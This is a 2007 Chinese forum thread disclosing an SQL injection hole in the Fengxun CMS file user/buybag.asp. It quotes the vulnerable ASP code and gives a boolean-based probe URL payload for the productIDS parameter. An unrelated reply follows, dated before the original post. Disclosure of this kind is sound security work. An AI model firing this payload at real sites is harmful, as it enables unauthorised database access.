服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务
设为首页收藏本站
开启辅助访问 切换到宽版

运维之家

 找回密码
 注册
搜索
运维之家»技术论坛 服务器网管区 windows技术 风迅最新注入漏洞
返回列表 发新帖
查看: 4682|回复: 1

风迅最新注入漏洞

[复制链接]
dirtysea 发表于 2007-11-9 19:54:51 | 显示全部楼层 |阅读模式
存在问题文件:
user/buybag.asp

40行开始
if request.Form("action")="makeorder" then
Dim productIDS,OrderRs,BagRs,OrderDetail,OrderNumber,ExpressCompany "
productIDS=DelHeadAndEndDot(request.Form("productIDS"))//这个函数功能是去掉头尾的逗号
Set orderRs=Server.CreateObject(G_FS_RS)
Set BagRs=Server.CreateObject(G_FS_RS) '
Set orderDetail=Server.CreateObject(G_FS_RS)
orderRs.open "Select * From FS_ME_Order where 1=2",User_Conn,1,3
BagRs.open "Select mid,BuyType,AddTime,UserNumber,BuyMoney,BuyNumber from FS_ME_BuyBag where MID in("&productIDS&")",User_Conn,1,1 ;
in()中注射发生!!  

user/buybag.asp?action=makeorder&productIDS=1 and 1=1)and(1=1
回复

使用道具 举报

骨色骨香 发表于 2006-6-7 06:53:27 | 显示全部楼层

re:风迅最新注入漏洞

........不看吧,怕上当会伤心;看了吧,感叹这世道,叫人寒心。 我知道这世界上的人,有好也有歹;但是一下次看到那么多负面的,冲击力还是很大的,容易对这个世界产生失望情绪。 唉....
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-4-24 06:56 , Processed in 0.365471 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表